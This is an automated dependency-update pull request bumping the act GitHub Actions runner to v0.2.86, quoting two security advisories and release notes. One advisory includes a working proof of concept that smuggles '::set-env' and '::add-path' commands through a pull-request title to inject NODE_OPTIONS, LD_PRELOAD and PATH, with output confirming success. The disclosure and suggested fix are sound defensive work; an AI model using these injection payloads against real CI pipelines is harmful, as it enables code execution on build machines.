Skip to content

fix(deps): update module github.com/nektos/act to v0.2.86 [security]#23

Open
TheFox0x7 wants to merge 1 commit into
renovate-testsfrom
renovate2/go-github.1485827954.workers.dev-nektos-act-vulnerability
Open

fix(deps): update module github.com/nektos/act to v0.2.86 [security]#23
TheFox0x7 wants to merge 1 commit into
renovate-testsfrom
renovate2/go-github.1485827954.workers.dev-nektos-act-vulnerability

Conversation

@TheFox0x7
Copy link
Copy Markdown
Owner

@TheFox0x7 TheFox0x7 commented Apr 25, 2026
edited
Loading

This PR contains the following updates:

Package Change Age Confidence
github.com/nektos/act v0.2.63v0.2.86 age confidence

act: actions/cache server allows malicious cache injection

CVE-2026-34042 / GHSA-x34h-54cw-9825 / GO-2026-4890

More information

Details

act's built-in actions/cache server listens to connections on all interfaces and allows anyone who can connect to it — including someone anywhere on the internet — to create caches with arbitrary keys and retrieve all existing caches. If one can predict which cache keys will be used by local actions, one can create malicious caches containing whatever files one pleases, most likely allowing arbitrary remote code execution within the Docker container.

Discovery

Discovered while discussing forgejo/runner#294.

Proposed Mitigation

It was discussed to append a secret to ACTIONS_CACHE_URL to retain compatibility with GitHub's cache action and still allow authorization. Forgejo is considering also encoding which repo is currently being run in CI into the secret in the URL to prevent unrelated repos using the same (probably global) runner from seeing each other's caches.

Severity

  • CVSS Score: 8.2 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

act: Unrestricted set-env and add-path command processing enables environment injection

CVE-2026-34041 / GHSA-xmgr-9pqc-h5vw / GO-2026-4891

More information

Details

Summary

act unconditionally processes the deprecated ::set-env:: and ::add-path:: workflow commands, which GitHub Actions disabled in October 2020 (CVE-2020-15228, GHSA-mfwh-5m23-j46w) due to environment injection risks. When a workflow step echoes untrusted data to stdout, an attacker can inject these commands to set arbitrary environment variables or modify the PATH for all subsequent steps in the job. This makes act strictly less secure than GitHub Actions for the same workflow file.

Vulnerable Code

pkg/runner/command.go, lines 52-58:

switch command {
case "set-env":
    rc.setEnv(ctx, kvPairs, arg)
case "set-output":
    rc.setOutput(ctx, kvPairs, arg)
case "add-path":
    rc.addPath(ctx, arg)

There is no check for the ACTIONS_ALLOW_UNSECURE_COMMANDS environment variable. The string ACTIONS_ALLOW_UNSECURE_COMMANDS does not appear anywhere in the act codebase.

On GitHub Actions, these commands are rejected unless ACTIONS_ALLOW_UNSECURE_COMMANDS=true is set:

Error: The `set-env` command is disabled. Please upgrade to using Environment Files
  or opt-in by setting ACTIONS_ALLOW_UNSECURE_COMMANDS=true.
PoC: Environment and PATH Injection via PR Title

Tested on: act 0.2.84, Docker Desktop 29.1.2, macOS Darwin 24.5.0

Step 1 — Create a workflow that logs PR metadata:

.github/workflows/vuln.yml:

name: Vulnerable Workflow
on: [pull_request]

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Log PR info
        run: |
          echo "Processing PR: $"

      - name: Subsequent step - check environment
        run: |
          echo "=== Environment Injection Check ==="
          echo "NODE_OPTIONS=$NODE_OPTIONS"
          echo "EVIL_VAR=$EVIL_VAR"
          echo "PATH=$PATH"

Step 2 — Create a malicious event payload:

event.json:

{
  "pull_request": {
    "title": "Fix typo\n::set-env name=EVIL_VAR::INJECTED_BY_ATTACKER\n::set-env name=NODE_OPTIONS::--require=/tmp/evil.js\n::add-path::/tmp/evil-bin",
    "number": 1,
    "head": { "ref": "fix-typo", "sha": "abc123" },
    "base": { "ref": "main", "sha": "def456" }
  }
}

Step 3 — Run:

git init && git add -A && git commit -m "init"
act pull_request -e event.json

Result:

[Vulnerable Workflow/build]   | Processing PR: Fix typo
[Vulnerable Workflow/build]   ⚙  ::set-env:: EVIL_VAR=INJECTED_BY_ATTACKER
[Vulnerable Workflow/build]   ⚙  ::set-env:: NODE_OPTIONS=--require=/tmp/evil.js
[Vulnerable Workflow/build]   ⚙  ::add-path:: /tmp/evil-bin
[Vulnerable Workflow/build]   ✅  Success - Main Log PR info

[Vulnerable Workflow/build]   | === Environment Injection Check ===
[Vulnerable Workflow/build]   | NODE_OPTIONS=--require=/tmp/evil.js
[Vulnerable Workflow/build]   | EVIL_VAR=INJECTED_BY_ATTACKER
[Vulnerable Workflow/build]   | PATH=/tmp/evil-bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
[Vulnerable Workflow/build]   | EXPLOITED: EVIL_VAR was injected into this step!
[Vulnerable Workflow/build]   ✅  Success
[Vulnerable Workflow/build] 🏁  Job succeeded

All three injections succeeded silently:

  • EVIL_VAR=INJECTED_BY_ATTACKER — arbitrary env var injected into subsequent step
  • NODE_OPTIONS=--require=/tmp/evil.js — Node.js code execution vector
  • /tmp/evil-bin prepended to PATH — command hijacking vector
Attack Scenarios

Scenario 1: Malicious PR title/body. An attacker opens a PR with ::set-env name=NODE_OPTIONS::--require=/tmp/evil.js embedded in the title. If any workflow step echoes the title (common for build summaries, Slack notifications, changelog generation), the injection fires. On GitHub Actions this is blocked. On act, it succeeds.

Scenario 2: Malicious branch name. $ is attacker-controlled. A branch named fix-typo%0A::set-env name=LD_PRELOAD::/tmp/evil.so can inject LD_PRELOAD, which causes every subsequent dynamically-linked binary to load the attacker's shared library.

Scenario 3: Commit message injection. If a step runs git log --oneline and the output flows to stdout, an attacker's commit message containing ::set-env:: commands will be processed.

Impact
  • Command injection via env vars: LD_PRELOAD, NODE_OPTIONS, PYTHONPATH, BASH_ENV, PERL5OPT all enable arbitrary code execution
  • PATH hijacking: attacker-controlled directory prepended to PATH hijacks any subsequent command
  • Cross-step escalation: a step that merely logs untrusted data compromises all subsequent steps
  • Supply chain risk: workflows that are safe on GitHub Actions become exploitable when run locally with act — developers have a false sense of security
Suggested Fix

Add a check matching GitHub Actions' behavior:

case "set-env":
    if rc.Env["ACTIONS_ALLOW_UNSECURE_COMMANDS"] != "true" {
        logger.Errorf("The `set-env` command is disabled. Please upgrade to using Environment Files or opt-in by setting ACTIONS_ALLOW_UNSECURE_COMMANDS=true")
        return false
    }
    rc.setEnv(ctx, kvPairs, arg)
case "add-path":
    if rc.Env["ACTIONS_ALLOW_UNSECURE_COMMANDS"] != "true" {
        logger.Errorf("The `add-path` command is disabled. Please upgrade to using Environment Files or opt-in by setting ACTIONS_ALLOW_UNSECURE_COMMANDS=true")
        return false
    }
    rc.addPath(ctx, arg)

This is a minimal, backwards-compatible fix — users who genuinely need these deprecated commands can opt in via ACTIONS_ALLOW_UNSECURE_COMMANDS=true, matching GitHub's approach.

Written by Golan Myers

Severity

  • CVSS Score: 7.7 / 10 (High)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

act: actions/cache server allows malicious cache injection in github.com/nektos/act

CVE-2026-34042 / GHSA-x34h-54cw-9825 / GO-2026-4890

More information

Details

act: actions/cache server allows malicious cache injection in github.com/nektos/act

Severity

Unknown

References

This data is provided by OSV and the Go Vulnerability Database (CC-BY 4.0).

act: Unrestricted set-env and add-path command processing enables environment injection in github.com/nektos/act

CVE-2026-34041 / GHSA-xmgr-9pqc-h5vw / GO-2026-4891

More information

Details

act: Unrestricted set-env and add-path command processing enables environment injection in github.com/nektos/act

Severity

Unknown

References

This data is provided by OSV and the Go Vulnerability Database (CC-BY 4.0).

Release Notes

nektos/act (github.com/nektos/act)

v0.2.86

Compare Source

Changelog

Other
  • e71313c chore: bump VERSION to 0.2.86
  • c28c27e Merge commit from fork
  • 0c739c8 Merge commit from fork
  • 10add23 build(deps): bump GitHub Actions to fix Node.js 20 deprecation (#​6036)

v0.2.85

Compare Source

Changelog

Other
  • 4ea8ec2 chore: bump VERSION to 0.2.85
  • 9e6190d build(deps): bump go.opentelemetry.io/otel/sdk from 1.28.0 to 1.40.0 (#​6014)
  • 77470a0 build(deps): bump github.com/cloudflare/circl from 1.6.1 to 1.6.3 (#​6010)
  • 1030ad2 build(deps): bump github.com/go-git/go-git/v5 from 5.16.2 to 5.16.5 (#​6001)

v0.2.84

Compare Source

Changelog

Bug fixes
Other

v0.2.83

Compare Source

Changelog

Other
  • 6abb867 chore: bump VERSION to 0.2.83
  • e16ac81 chore(mergify) Add merge queue configuration to .mergify.yml (#​5944)

v0.2.82

Compare Source

Changelog

Other
  • 3d71542 chore: bump VERSION to 0.2.82
  • 2f9675f build(deps): bump the dependencies group across 1 directory with 10 updates (#​5935)

v0.2.81

Compare Source

Changelog

Bug fixes
Other
  • f5a0dde chore: bump VERSION to 0.2.81
  • c8a205e refactor: simplify adding new node versions add node 24 (#​5899)
  • a78b3f3 chore: mergify does no longer support queue_conditions != merge_conditions for require status checks to be up to date (#​5891)

v0.2.80

Compare Source

Changelog

Bug fixes
  • 61396d8 fix: use ubuntu-latest bookworm instead of buster for tests (#​5884)
Other
  • bf8e52b chore: bump VERSION to 0.2.80
  • 5319acf build(deps): bump the dependencies group with 5 updates (#​5861)

v0.2.79

Compare Source

Changelog

New Features
Bug fixes
Other
  • 7e22245 chore: bump VERSION to 0.2.79
  • dd58f5e build(deps): bump github.com/go-viper/mapstructure/v2 (#​5837)
  • 0bc47ae added info log when container image platform mismatched (#​3225)
  • d9c6afc ci: fix goreleaser config (#​5276)
  • 1622c21 build(deps): bump the dependencies group across 1 directory with 5 updates (#​4986)

v0.2.78

Compare Source

Changelog

New Features
  • 16b86a6 feat: add cli option to set concurrent jobs count (#​2762)
  • bd4bc99 feat: add models permission level for AI inference responses (#​2767)
Bug fixes
Documentation updates
Other

v0.2.77

Compare Source

Changelog

Other

v0.2.76

Compare Source

Changelog

New Features
Bug fixes
  • 517c3ac fix: reporting fetch failure as job error and log the error (#​2715)
Other

v0.2.75

Compare Source

Changelog

New Features
Bug fixes
Other

v0.2.74

Compare Source

Changelog

Other

v0.2.73

Compare Source

Changelog

Other

v0.2.72

Compare Source

Changelog

Other
  • be1b6ee chore: bump VERSION to 0.2.72
  • 9dd0854 Added support for dereferenced map properties (#​2635)
  • 7c45ad6 build(deps): bump github.com/docker/cli (#​2634)
  • 7bfe066 build(deps): bump github.com/rhysd/actionlint from 1.7.6 to 1.7.7 (#​2624)
  • bcafb8f build(deps): bump google.golang.org/protobuf from 1.36.2 to 1.36.3 (#​2623)
  • 652265b build(deps): bump golangci/golangci-lint-action from 6.1.1 to 6.2.0 (#​2622)
  • 5ce39f6 Add GitHub Local Actions to README (#​2588)
  • a9e31cd build(deps): bump google.golang.org/protobuf from 1.36.1 to 1.36.2 (#​2612)
  • 0ff68e6 build(deps): bump github.com/go-git/go-git/v5 from 5.13.0 to 5.13.1 (#​2604)
  • 4c9875b build(deps): bump github.com/rhysd/actionlint from 1.7.5 to 1.7.6 (#​2603)
  • 24adb1e build(deps): bump golang.org/x/term from 0.27.0 to 0.28.0 (#​2602)

v0.2.71

Compare Source

Changelog

New Features
  • fe017a1 feat: Adding in logic to check if act needs to be downloaded (#​2575)
Bug fixes
  • deea8ec fix: prevent unintended input replacement in reusable workflows with workflow_dispatch when using workflow_call (#​2502)
  • b4ef6fb fix: short sha has at least four digits (#​2540)
  • e6b5062 fix: amd64 arch to X64 (#​2580)
Other
  • 0006dee chore: bump VERSION to 0.2.71
  • 0ca1e18 Fix typo in --action-offline-mode option description (#​2590)
  • a64359c build(deps): bump github.com/go-git/go-git/v5 from 5.12.0 to 5.13.0 (#​2595)
  • ccfadfe build(deps): bump github.com/go-git/go-billy/v5 from 5.6.0 to 5.6.1 (#​2594)
  • c315398 build(deps): bump github.com/rhysd/actionlint from 1.7.4 to 1.7.5 (#​2593)
  • bd8dda1 ci(mergify): upgrade configuration to current format (#​2547)
  • 7172fc3 chore: upgrade dependencies (#​2589)

v0.2.70

Compare Source

Changelog

Other
  • 9c7f103 chore: bump VERSION to 0.2.70
  • 0e8b33b build(deps): bump megalinter/megalinter from 8.2.0 to 8.3.0 (#​2541)
  • 69ec4a5 build(deps): bump github.com/creack/pty from 1.1.23 to 1.1.24 (#​2533)
  • c90203e build(deps): bump codecov/codecov-action from 4 to 5 (#​2532)
  • e5e7bdd build(deps): bump megalinter/megalinter from 8.1.0 to 8.2.0 (#​2531)
  • ebcc0a8 build(deps): bump github.com/rhysd/actionlint from 1.7.3 to 1.7.4 (#​2527)
  • 9bd99e5 build(deps): bump github.com/adrg/xdg from 0.5.0 to 0.5.3 (#​2515)

v0.2.69

Compare Source

Changelog

New Features
Bug fixes
Other
  • 0de940b chore: bump VERSION to 0.2.69
  • e3b4e3a add test for listartifacts v4 filter (#​2507)
  • 0c09a77 build(deps): bump github.com/go-git/go-billy/v5 from 5.5.0 to 5.6.0 (#​2506)
  • 9135745 build(deps): bump github.com/opencontainers/selinux (#​2498)
  • ccd28e7 build(deps): bump megalinter/megalinter from 8.0.0 to 8.1.0 (#​2485)
  • 5031a9f build(deps): bump google.golang.org/protobuf from 1.34.2 to 1.35.1 (#​2484)
  • bb9f36d build(deps): bump golang.org/x/term from 0.24.0 to 0.25.0 (#​2480)
  • ad1cef0 build(deps): bump golangci/golangci-lint-action from 6.0.1 to 6.1.1 (#​2479)

v0.2.68

Compare Source

Changelog

New Features
  • 013c0d4 feat: generate a manual page automatically with cobra/doc (#​2352)
Other

v0.2.67

Compare Source

Changelog

Bug fixes
Other
  • f75a2d8 chore: bump VERSION to 0.2.67
  • d8b6f61 build(deps): bump golang.org/x/term from 0.23.0 to 0.24.0 (#​2442)

v0.2.66

Compare Source

Changelog

New Features
Other
  • 38e43bd chore: bump VERSION to 0.2.66
  • c9ae534 build(deps): bump golang.org/x/term from 0.22.0 to 0.23.0 (#​2421)
  • ca292cd build(deps): bump megalinter/megalinter from 7.13.0 to 8.0.0 (#​2436)
  • f79a13e build(deps): bump dario.cat/mergo from 1.0.0 to 1.0.1 (#​2430)
  • 60a2fed fix GOOS parsing to match expected GHA RUNNER_OS values (#​2422)

v0.2.65

Compare Source

Changelog

Bug fixes
Other
  • bda491e chore: bump VERSION to 0.2.65
  • cd8b710 remove double negation in --help (#​2405)
  • a62063b Bump mergo to v1.0.0 with new module URL (#​2403)
  • 2feff3f build(deps): bump github.com/timshannon/bolthold to v0.0.0-20240314194003-30aac6950928 (#​2248)
  • 570ccf3 Fix #​2363. Add /pre- and /post-entrypoint handling (#​2394)
  • 1d6a00c build(deps): bump golang.org/x/term from 0.21.0 to 0.22.0 (#​2387)
  • 21fe901 build(deps): bump github.com/adrg/xdg from 0.4.0 to 0.5.0 (#​2398)
  • 1ac4b60 build(deps): bump megalinter/megalinter from 7.11.1 to 7.13.0 (#​2389)

v0.2.64

Compare Source

Changelog

Bug fixes
Other
  • aa54ea9 chore: bump VERSION to 0.2.64
  • 935e4c3 build(deps): bump github.com/spf13/cobra from 1.8.0 to 1.8.1 (#​2366)
  • 8a64a76 build(deps): bump google.golang.org/protobuf from 1.34.1 to 1.34.2 (#​2365)
  • f9ea5e3 build(deps): bump golang.org/x/term from 0.20.0 to 0.21.0 (#​2360)
  • 7b950e1 build(deps): bump github.com/docker/cli (#​2358)
  • 55a8f9a Add riscv64 binary release (#​2350)
  • 71a6fa0 build(deps): bump github.com/rhysd/actionlint from 1.7.0 to 1.7.1 (#​2346)

Configuration

📅 Schedule: (UTC)

  • Branch creation
    • ""
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR has been generated by Mend Renovate.

@TheFox0x7 TheFox0x7 force-pushed the renovate2/go-github.1485827954.workers.dev-nektos-act-vulnerability branch from 81c77f0 to d9f5c6b Compare April 26, 2026 12:23
@TheFox0x7 TheFox0x7 changed the base branch from renovate to renovate-tests April 26, 2026 12:23
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

dependencies

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@TheFox0x7